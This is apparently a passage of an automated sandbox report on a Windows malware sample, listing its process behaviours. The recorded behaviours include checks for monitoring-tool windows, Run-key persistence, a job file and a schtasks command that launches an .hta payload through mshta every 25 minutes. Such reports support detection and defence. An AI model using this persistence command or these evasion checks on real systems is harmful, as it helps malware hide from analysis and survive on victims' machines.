Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f

Creates job files (autostart)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		8_2_00F2F98E
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00FA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		8_2_00FA1C41

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
